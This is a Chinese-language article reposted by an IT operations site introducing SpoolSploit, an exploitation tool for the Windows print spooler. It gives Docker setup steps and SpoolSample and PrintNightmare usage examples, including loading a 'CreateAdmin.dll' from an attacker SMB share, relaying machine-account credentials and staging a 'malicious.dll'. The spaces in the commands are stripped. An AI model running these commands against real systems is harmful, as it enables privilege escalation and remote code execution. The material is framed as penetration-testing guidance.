关于SpoolSploit
SpoolSploit是一款针对Windows打印后台处理程序(print spooler)的安全审计工具,广大研究人员可以使用SpoolSploit检测Windows打印后台处理程序(print spooler)中存在的安全漏洞,并通过实际的利用技术来进行渗透测试或安全审计。
SpoolSploit中还封装了很多其他的实用工具,以便进行实际的漏洞利用和渗透测试。并实现了两种方法来中继计算机帐户凭据,以升级权限并在具有完全系统访问权限的节点上执行恶意DLL。
快速开始
自该项目发布之日起,SpoolSploit Docker容器已在最新版本的macOS、Ubuntu Linux和Windows 10上成功测试。
我们建议广大用户在SpoolSploit Docker容器内执行渗透测试或凭据中继测试,并托管相应的DLL文件,然后确保运行Docker容器的主机上开启并未使用的445端口。在Windows主机上运行此容器时,这种情况最为普遍,因为默认情况下它使用的是端口445。如果你的主机上端口445已被占用或无法使用的话,可以在网桥模式下配置了网络适配器的虚拟机中运行Docker容器即可。
(1) 工具下载&访问SpoolSploit容器
首先,使用下列命令将该项目源码克隆至本地:
gitclonehttps://github.com/BeetleChunks/SpoolSploit
接下来,构建SpoolSploit Docker容器镜像:
cdSpoolSploit sudodockerbuild-tspoolsploit.
创建并启动SpoolSploit Docker容器:
sudodockerrun-dit-p445:445--namespoolsploitspoolsploit:latest
绑定容器:
sudodockerexec-itspoolsploit/bin/bash
(2) 命令行使用
usage:spool_sploit.py[-h]-a{spoolsample,nightmare}-rHRHOST-rP{139,445}[-lHLHOST][-lSLSHARE]-dDOMAIN-uUSER-pPASSWD optionalarguments: -h,--help显示帮助信息并退出 -a{spoolsample,nightmare},--attack{spoolsample,nightmare} 需要在目标主机上执行的测试类型 -rHRHOST,--rhostRHOST 远程目标IP、CIDR范围或文件名(file:<path>) -rP{139,445},--rport{139,445} 远程SMB服务器端口 -lHLHOST,--lhostLHOST 监听主机名或IP地址 -lSLSHARE,--lshareLSHARE SMB共享(UNC) -dDOMAIN,--domainDOMAIN 身份认证域名 -uUSER,--usernameUSER 身份认证用户名 -pPASSWD,--passwordPASSWD 身份认证密码
工机使用样例
使用样例1:
python3spool_sploit.py-aspoolsample-lH10.14.1.24-devil.corp-urjmcdow-p'P4ssword123!'-rP445-rH10.5.1.10
使用样例2:
python3spool_sploit.py-anightmare-lS'\\10.14.1.24\C$\CreateAdmin.dll'-devil.corp-urjmcdow-p'P4ssword123!'-rP445-rH10.5.1.10
SpoolSample – Windows设备账号凭证获取和中继
sudodockercp./malicious.dllspoolsploit:/home/dlogmas/smbserver/share/ sudodockerexecspoolsploit/bin/sh-c'sudochowndlogmas:dlogmas/home/dlogmas/smbserver/share/malicious.dll'
工具使用截图
项目地址
SpoolSploit:【GitHub
转载请注明:IT运维空间 » 安全防护 » 如何使用SpoolSploit审查Windows打印后台处理程序的安全性
发表评论